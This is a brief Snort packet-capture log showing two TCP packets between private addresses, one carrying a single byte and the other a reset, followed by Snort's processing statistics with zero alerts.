11/14-16:59:09.374075 0:D0:9:27:66:18 -> 0:3:FD:FA:30:1C type:0x800 len:0x43
192.168.128.50:2222 -> 192.168.20.11:1672 TCP TTL:64 TOS:0x0 ID:1199 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0xCC5BFD4A Ack: 0xCC1DCE09 Win: 0x7C70 TcpLen: 32
TCP Options (3) => NOP NOP TS: 37291 115107592
65                                               e
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
11/14-16:59:09.375205 0:3:FD:FA:30:1C -> 0:D0:9:27:66:18 type:0x800 len:0x3C
192.168.20.11:1672 -> 192.168.128.50:2222 TCP TTL:254 TOS:0x0 ID:44640 IpLen:20 DgmLen:40
*****R** Seq: 0xCC1DCE09 Ack: 0x0 Win: 0x0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

===============================================================================
Snort processed 62 packets.
Breakdown by protocol:                Action Stats:
    TCP: 55         (88.710%)         ALERTS: 0
    UDP: 7          (11.290%)         LOGGED: 0
   ICMP: 0          (0.000%)          PASSED: 0
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
Fragmentation Stats:
Fragmented IP Packets: 0          (0.000%)
   Rebuilt IP Packets: 0
   Frag elements used: 0
Discarded(incomplete): 0
   Discarded(timeout): 0
===============================================================================
TCP Stream Reassembly Stats:
        TCP Packets Used: 0          (0.000%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 0
===============================================================================